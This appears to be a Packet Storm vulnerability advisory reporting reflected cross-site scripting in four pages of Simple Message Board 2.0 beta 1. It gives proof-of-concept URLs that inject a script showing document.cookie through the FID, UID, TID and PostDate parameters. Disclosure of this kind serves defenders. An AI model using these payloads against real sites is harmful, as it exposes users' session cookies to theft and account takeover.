Simple Message Board version 2.0 beta 1 is susceptible to cross site scripting attacks in forum.cfm.
d391fcec0970072da72e616ee4b0bbd39950fc38d7955f1415bf0466102bb435[T]his BUGS discovered by rUnViRuS
Http://www.security-arab.com
=-=-=-=-=-=-=-=-=
xss in forums
Simple Message Board Version 2.0 Beta 1
Powered by Man and Machine, Ltd
Exploit
=-=-=-=
XSS in forum.cfm
https://www.example.com/forum/forum.cfm?FID=<script>JavaScript:alert(document.cookie);</script>
=-=-=-=-=-=-
XSS in user.cfm
https://www.example.com/forum/user.cfm?UID=<script>JavaScript:alert(document.cookie);</script>
=-=-=-=-=-=
XSS in thread.cfm
https://www.example.com/forum/thread.cfm?TID=<script>JavaScript:alert(document.cookie);</script>
=-=-==-=-=-=-=-
XSS IN search.cfm
https://www.example.com/forum/search.cfm?PostDate=<script>JavaScript:alert(document.cookie);</script>
=-=-=-=-=-=-=-=-=-=
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed